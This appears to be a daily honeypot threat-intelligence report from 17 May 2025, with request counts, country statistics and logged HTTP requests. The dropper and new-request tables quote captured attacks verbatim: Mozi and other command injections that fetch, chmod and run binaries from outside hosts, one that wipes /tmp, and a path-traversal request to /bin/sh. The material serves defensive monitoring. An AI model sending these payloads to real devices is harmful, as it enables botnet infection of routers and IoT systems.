Skip to main content
  1. Daily-Posts/

Report: 2025-05-17

·313 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-17
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 7 new requests that have never been observed before (these were added to the monitored request database.).

A total of 889 requests were recorded during the day, originating from 4 different countries, with a peak of 206 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
USGermany
KRGermany
USDubai
FRIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
120.138.12.24527;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
201.110.226.12GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
27.215.87.19027;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
141.98.11.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
742POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1
2051\x00\x11Clickhouse client\x18\x0C\xCA\xA9\x03\x00\x07default\x00
2281\x00\x00\x00T\x00\x03\x00\x00user\x00postgres\x00database\x00postgres\x00application_name\x00psql\x00client_encoding\x00UTF8\x00\x00
2681GET /socket.io/1/?t=1747451036116 HTTP/1.1
3451GET /Odin/http/call1747468019 HTTP/1.1
3461GET /OdinHttpCall1747468019 HTTP/1.1
3481GET /odinhttpcall1747468019 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0206US
178NL
274CN
370PL
466CH
558DE
645BG
740FR
834GB
933JP
1028UA
1128IN
1226SC
1313SG
1413IL
1513LT
1611AZ
179CA
187KR
197RO
206GH
214BE
223AO
233MC
243IR
253HK
261MX
271IT
281BR
291ZA
301ES
311PT
321PH
331TR

Related

Report: 2025-05-16
·1581 words
Repport Daily
Report: 2025-05-15
·368 words
Repport Daily
Report: 2025-05-14
·403 words
Repport Daily